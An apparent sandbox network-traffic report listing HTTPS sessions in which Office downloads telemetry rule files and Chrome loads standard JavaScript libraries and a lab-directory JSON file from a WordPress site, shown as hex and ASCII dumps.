                                                                                                                                          2024-11-28 10:33:04 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          80192.168.2.4498395.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:04 UTC595OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/slick.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:05 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:04 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 50225
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:04 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:05 UTC7876INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 66 61 63 74 6f 72 79 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 7b 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 61 63 74 6f 72 79 29 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 66 61 63 74 6f 72 79 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 7d 65 6c 73 65 7b 66 61 63 74 6f 72 79 28 6a 51 75 65 72 79 29 7d 7d 29 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 53 6c 69 63 6b 3d 77 69 6e 64 6f 77 2e 53 6c 69 63 6b 7c 7c
                                                                                                                                          Data Ascii: (function(factory){"use strict";if(typeof define==="function"&&define.amd){define(["jquery"],factory)}else if(typeof exports!=="undefined"){module.exports=factory(require("jquery"))}else{factory(jQuery)}})(function($){"use strict";var Slick=window.Slick||
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 6c 65 64 22 3a 22 74 72 75 65 22 2c 74 61 62 69 6e 64 65 78 3a 22 2d 31 22 7d 29 7d 7d 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 75 69 6c 64 44 6f 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 2c 69 2c 64 6f 74 3b 69 66 28 5f 2e 6f 70 74 69 6f 6e 73 2e 64 6f 74 73 3d 3d 3d 74 72 75 65 26 26 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3e 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 29 7b 5f 2e 24 73 6c 69 64 65 72 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 64 6f 74 74 65 64 22 29 3b 64 6f 74 3d 24 28 22 3c 75 6c 20 2f 3e 22 29 2e 61 64 64 43 6c 61 73 73 28 5f 2e 6f 70 74 69 6f 6e 73 2e 64 6f 74 73 43 6c 61 73 73 29 3b 66 6f 72 28 69 3d 30 3b 69 3c 3d 5f 2e 67 65 74 44 6f 74 43 6f 75 6e 74 28 29
                                                                                                                                          Data Ascii: led":"true",tabindex:"-1"})}}};Slick.prototype.buildDots=function(){var _=this,i,dot;if(_.options.dots===true&&_.slideCount>_.options.slidesToShow){_.$slider.addClass("slick-dotted");dot=$("<ul />").addClass(_.options.dotsClass);for(i=0;i<=_.getDotCount()
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 2e 72 65 6d 6f 76 65 28 29 7d 7d 69 66 28 5f 2e 24 73 6c 69 64 65 73 29 7b 5f 2e 24 73 6c 69 64 65 73 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 73 6c 69 64 65 20 73 6c 69 63 6b 2d 61 63 74 69 76 65 20 73 6c 69 63 6b 2d 63 65 6e 74 65 72 20 73 6c 69 63 6b 2d 76 69 73 69 62 6c 65 20 73 6c 69 63 6b 2d 63 75 72 72 65 6e 74 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 64 61 74 61 2d 73 6c 69 63 6b 2d 69 6e 64 65 78 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 74 68 69 73 29 2e 61 74 74 72 28 22 73 74 79 6c 65 22 2c 24 28 74 68 69 73 29 2e 64 61 74 61 28 22 6f 72 69 67 69 6e 61 6c 53 74 79 6c 69 6e 67 22 29 29 7d 29 3b 5f 2e 24 73 6c 69 64 65 54 72
                                                                                                                                          Data Ascii: .remove()}}if(_.$slides){_.$slides.removeClass("slick-slide slick-active slick-center slick-visible slick-current").removeAttr("aria-hidden").removeAttr("data-slick-index").each(function(){$(this).attr("style",$(this).data("originalStyling"))});_.$slideTr
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 73 61 67 65 3a 22 70 72 65 76 69 6f 75 73 22 7d 2c 5f 2e 63 68 61 6e 67 65 53 6c 69 64 65 29 3b 5f 2e 24 6e 65 78 74 41 72 72 6f 77 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 2c 7b 6d 65 73 73 61 67 65 3a 22 6e 65 78 74 22 7d 2c 5f 2e 63 68 61 6e 67 65 53 6c 69 64 65 29 7d 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 44 6f 74 45 76 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 69 66 28 5f 2e 6f 70 74 69 6f 6e 73 2e 64 6f 74 73 3d 3d 3d 74 72 75 65 26 26 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3e 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 29 7b 24 28 22 6c 69 22 2c 5f 2e 24 64 6f 74 73 29 2e 6f 6e 28 22 63 6c 69 63 6b
                                                                                                                                          Data Ascii: sage:"previous"},_.changeSlide);_.$nextArrow.off("click.slick").on("click.slick",{message:"next"},_.changeSlide)}};Slick.prototype.initDotEvents=function(){var _=this;if(_.options.dots===true&&_.slideCount>_.options.slidesToShow){$("li",_.$dots).on("click
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 73 48 61 6e 64 6c 65 72 28 29 3b 5f 2e 70 61 75 73 65 64 3d 21 5f 2e 6f 70 74 69 6f 6e 73 2e 61 75 74 6f 70 6c 61 79 3b 5f 2e 61 75 74 6f 50 6c 61 79 28 29 3b 5f 2e 24 73 6c 69 64 65 72 2e 74 72 69 67 67 65 72 28 22 72 65 49 6e 69 74 22 2c 5b 5f 5d 29 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 0a 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 21 3d 3d 5f 2e 77 69 6e 64 6f 77 57 69 64 74 68 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 5f 2e 77 69 6e 64 6f 77 44 65 6c 61 79 29 3b 5f 2e 77 69 6e 64 6f 77 44 65 6c 61 79 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 77 69 6e 64 6f 77 57 69 64 74 68 3d
                                                                                                                                          Data Ascii: sHandler();_.paused=!_.options.autoplay;_.autoPlay();_.$slider.trigger("reInit",[_])};Slick.prototype.resize=function(){var _=this;if($(window).width()!==_.windowWidth){clearTimeout(_.windowDelay);_.windowDelay=window.setTimeout(function(){_.windowWidth=
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 7b 69 66 28 5f 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 3d 3d 3d 74 72 75 65 29 7b 69 6e 66 69 6e 69 74 65 43 6f 75 6e 74 3d 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2b 31 7d 65 6c 73 65 7b 69 6e 66 69 6e 69 74 65 43 6f 75 6e 74 3d 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 7d 66 6f 72 28 69 3d 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3b 69 3e 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 2d 69 6e 66 69 6e 69 74 65 43 6f 75 6e 74 3b 69 2d 3d 31 29 7b 73 6c 69 64 65 49 6e 64 65 78 3d 69 2d 31 3b 24 28 5f 2e 24 73 6c 69 64 65 73 5b 73 6c 69 64 65 49 6e 64 65 78 5d 29 2e 63 6c 6f 6e 65 28 74 72 75 65 29 2e 61 74 74 72 28 22 69 64 22 2c 22 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 6c 69 63 6b 2d 69 6e 64 65
                                                                                                                                          Data Ascii: {if(_.options.centerMode===true){infiniteCount=_.options.slidesToShow+1}else{infiniteCount=_.options.slidesToShow}for(i=_.slideCount;i>_.slideCount-infiniteCount;i-=1){slideIndex=i-1;$(_.$slides[slideIndex]).clone(true).attr("id","").attr("data-slick-inde
                                                                                                                                          2024-11-28 10:33:05 UTC2349INData Raw: 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 69 66 28 5f 2e 24 73 6c 69 64 65 73 43 61 63 68 65 21 3d 3d 6e 75 6c 6c 29 7b 5f 2e 75 6e 6c 6f 61 64 28 29 3b 5f 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 63 68 69 6c 64 72 65 6e 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 29 2e 64 65 74 61 63 68 28 29 3b 5f 2e 24 73 6c 69 64 65 73 43 61 63 68 65 2e 61 70 70 65 6e 64 54 6f 28 5f 2e 24 73 6c 69 64 65 54 72 61 63 6b 29 3b 5f 2e 72 65 69 6e 69 74 28 29 7d 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 24 28 22 2e 73 6c 69 63 6b 2d 63 6c 6f 6e 65 64 22 2c 5f 2e 24 73 6c 69 64 65 72 29 2e 72 65 6d 6f 76 65 28 29 3b 69 66 28 5f 2e 24 64 6f 74 73 29
                                                                                                                                          Data Ascii: nction(){var _=this;if(_.$slidesCache!==null){_.unload();_.$slideTrack.children(this.options.slide).detach();_.$slidesCache.appendTo(_.$slideTrack);_.reinit()}};Slick.prototype.unload=function(){var _=this;$(".slick-cloned",_.$slider).remove();if(_.$dots)


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          81192.168.2.44984313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:04 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:04 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 407
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                                                                                          x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103304Z-174f7845968jrjrxhC1EWRmmrs0000000yag000000008yth
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          82192.168.2.44984413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:04 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:04 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 486
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                          ETag: "0x8DC582BB344914B"
                                                                                                                                          x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103304Z-174f7845968ljs8phC1EWRe6en0000000y50000000004h4e
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          83192.168.2.4498475.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:04 UTC599OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:05 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:05 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 5504
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:05 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:05 UTC5504INData Raw: 2f 2a 21 20 6d 6f 64 65 72 6e 69 7a 72 20 33 2e 33 2e 31 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 3f 2d 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 2d 63 73 73 74 72 61 6e 73 66 6f 72 6d 73 2d 63 73 73 74 72 61 6e 73 66 6f 72 6d 73 33 64 2d 63 73 73 74 72 61 6e 73 69 74 69 6f 6e 73 2d 70 72 65 66 69 78 65 64 2d 73 65 74 63 6c 61 73 73 65 73 20 21 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 3d 3d 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 76 61 72 20 65 2c 6e 2c 74 2c 73 2c 69 2c 6f 2c 61 3b 66 6f 72 28 76 61 72 20 66
                                                                                                                                          Data Ascii: /*! modernizr 3.3.1 (Custom Build) | MIT * * https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixed-setclasses !*/!function(e,n,t){function r(e,n){return typeof e===n}function s(){var e,n,t,s,i,o,a;for(var f


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          84192.168.2.4498485.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:04 UTC399OUTGET /wp-content/plugins/lab-finder/labs.json?v=1732789978972 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:05 UTC304INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:05 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Thu, 20 Jun 2024 09:10:05 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 514046
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:33:05 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/json
                                                                                                                                          2024-11-28 10:33:05 UTC7888INData Raw: 5b 7b 22 69 64 22 3a 35 2c 22 6e 61 6d 65 22 3a 22 4c 2e 41 2e 42 2e 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 62 2d 73 6c 2e 63 6f 6d 22 2c 22 77 65 62 22 3a 22 6c 61 62 2d 73 6c 2e 63 6f 6d 22 2c 22 63 6f 6e 74 61 63 74 22 3a 22 4a 75 61 6e 20 52 61 6d 69 72 65 7a 20 43 61 73 73 69 6e 65 6c 6c 6f 20 7c 20 2b 33 34 20 36 37 32 20 33 38 35 20 38 36 33 20 7c 20 6a 72 61 6d 69 72 65 7a 40 6c 61 62 2d 73 6c 2e 63 6f 6d 22 2c 22 6c 61 62 5f 73 65 72 76 69 63 65 73 22 3a 22 22 2c 22 69 6e 64 75 73 74 72 69 65 73 22 3a 22 22 2c 22 73 70 65 63 69 61 6c 5f 73 65 72 76 69 63 65 73 22 3a 22 22 2c 22 69 6e 64 75 73 74 72 79 22 3a 5b 22 2a 22 2c 35 2c 31 2c 33 5d 2c 22 73 65 72 76 69 63 65 22 3a 5b 22 2a 22 2c 33 2c 32 2c 31 5d 2c 22 6c 61
                                                                                                                                          Data Ascii: [{"id":5,"name":"L.A.B.","url":"https://www.lab-sl.com","web":"lab-sl.com","contact":"Juan Ramirez Cassinello | +34 672 385 863 | jramirez@lab-sl.com","lab_services":"","industries":"","special_services":"","industry":["*",5,1,3],"service":["*",3,2,1],"la
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 65 64 69 75 6d 5f 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 32 34 2c 22 6c 61 72 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 35 2f 32 30 32 34 2f 30 34 2f 4c 41 42 2d 4c 61 62 6f 72 61 74 6f 72 69 6f 2d 41 6c 6d 65 72 69 61 2d 31 2e 70 6e 67 22 2c 22 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 32 30 30 2c 22 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 32 34 2c 22 31 35 33 36 78 31 35 33 36 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 35 2f 32 30 32 34 2f 30 34 2f 4c 41 42 2d 4c 61 62 6f 72 61 74 6f 72
                                                                                                                                          Data Ascii: edium_large-height":124,"large":"https://www.tentamus-web.com/wp-content/uploads/sites/5/2024/04/LAB-Laboratorio-Almeria-1.png","large-width":200,"large-height":124,"1536x1536":"https://www.tentamus-web.com/wp-content/uploads/sites/5/2024/04/LAB-Laborator
                                                                                                                                          2024-11-28 10:33:05 UTC8000INData Raw: 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 38 2f 32 30 31 37 2f 30 32 2f 4c 61 62 47 72 6f 75 70 4c 6f 67 6f 73 5f 54 65 6e 74 61 43 68 69 6e 61 2d 33 30 30 78 31 31 31 2e 6a 70 67 22 2c 22 6d 65 64 69 75 6d 2d 77 69 64 74 68 22 3a 33 30 30 2c 22 6d 65 64 69 75 6d 2d 68 65 69 67 68 74 22 3a 31 31 31 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 38 2f 32 30 31 37 2f 30 32 2f 4c 61 62 47 72 6f 75 70 4c 6f 67 6f 73 5f 54 65 6e 74 61 43 68 69 6e 61 2e 6a 70 67 22 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 33
                                                                                                                                          Data Ascii: us-web.com/wp-content/uploads/sites/8/2017/02/LabGroupLogos_TentaChina-300x111.jpg","medium-width":300,"medium-height":111,"medium_large":"https://www.tentamus-web.com/wp-content/uploads/sites/8/2017/02/LabGroupLogos_TentaChina.jpg","medium_large-width":3
